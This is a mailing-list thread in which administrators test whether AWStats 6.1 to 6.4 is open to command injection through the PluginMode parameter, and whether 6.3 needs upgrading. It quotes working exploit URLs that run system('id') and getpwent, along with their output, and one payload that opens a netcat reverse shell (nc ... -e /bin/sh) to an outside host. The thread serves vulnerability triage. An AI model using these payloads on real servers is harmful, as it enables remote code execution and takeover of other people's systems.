Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?

[Jamie Pratt <jpratt@xxxxxxxxxxx>]

Still no dice on 6.3, even with the "config=www.site.org" etc,etc.. same 
error. So.. Can we all agree that 6.3 is not vulnerable, because I'd 
rather not upgrade to a dev/unstable release for no reason...

regards,
jamie

Herman Sheremetyev wrote:
> It works on mine too, though I still have 6.1.  I think you may need to 
> add the config=www.example.com into the url between the '?' and the '&' 
> for it to work properly though.  On my linux boxes with apache 2.0 it 
> displays the command output in the page but on openbsd with apache 1.3 
> it gives a 500 Server Error because the output ends up in the headers 
> somehow.  Either way it works though.
>
> -Herman
>
> Ondra Holecek wrote:
>
> > It seems this bug works only on my server, i dont know why
> >
> > /awstats.pl?&PluginMode=:print+system('id')+;
> >
> > reply:
> >
> > uid=99(nobody) gid=4294967295 groups=4294967295,98(nobody) 256
> > Error:
> >
> > Setup ('/usr/local/etc/awstats/awstats.conf' file, web server or
> > permissions) may be wrong.
> > Check config file, permissions and AWStats documentation (in 'docs'
> > directory).
> >
> >
> > awstats: Advanced Web Statistics 6.1 (build 1.751)  (original)
> > perl: This is perl, v5.8.5 built for i586-linux
> > os: Linux xxx.tld 2.4.22 #4 Wed Jul 7 21:07:03 CEST 2004 i586 unknown
> > unknown GNU/Linux
> >
> > Ondra
> >
> >
> > Jamie Pratt wrote:
> > | So what are the conditions of this bug/vuln?  I can't reproduce this on
> > | several 6.3 installs..:
> > |
> > | awstats 6.3 from source:
> > |
> > | request:
> > |
> > |
> > http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('id')+; 
> >
> >
> > |
> > |
> > | output:
> > | ****************
> > | Error: Can't locate object method "BuildFullHTMLOutput_print" via
> > | package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1)
> > | line 1.
> > |
> > | Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or
> > | permissions) may be wrong.
> > | Check config file, permissions and AWStats documentation (in 'docs'
> > | directory).
> > | ***************
> > |
> > | regards,
> > | jamie
> > |
> > | Ondra Holecek wrote:
> > |
> > |>
> > |>
> > |> GHC@xxxxxxxxxxxxxxxxxxxxx wrote:
> > |> |
> > |> | /*==========================================*/
> > |> | // GHC -> AWStats <- ADVISORY
> > |> | \\ PRODUCT: AWStats
> > |> | // VERSION: <= 6.3
> > |> | \\ URL: http://awstats.sourceforge.net/
> > |> | // VULNERABILITY CLASS: Multiple vulnerabilities
> > |> | \\ RISK: high
> > |> | /*==========================================*/
> > |>
> > |> [...]
> > |>
> > |> |
> > |> | PluginMode=:print+getpwent
> > |> |
> > |> | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
> > |> | This will satisfy eval() requirements., and :print getpwent() is
> > |> executed.
> > |> |
> > |> |
> > |>
> > http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent 
> >
> >
> > |>
> > |> |
> > |> | Sanitazing limits user's input, but there is no filtration for call
> > |> sympols '()'.
> > |>
> > |> no, user is not limited, he can execute ANY command if he add ; at the
> > |> end of the command, try this
> > |>
> > |> awstats.pl?&PluginMode=:print+system('id')+;
> > |>
> > |> or even this
> > |>
> > |> 
> > awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
> > |>
> > |>
> > |> Ondra
> > |
> > |

--

James Pratt
Unix Systems Administrator
Norwich University
http://www.norwich.edu/it
<jpratt@xxxxxxxxxxx> | ph. (802)485-2532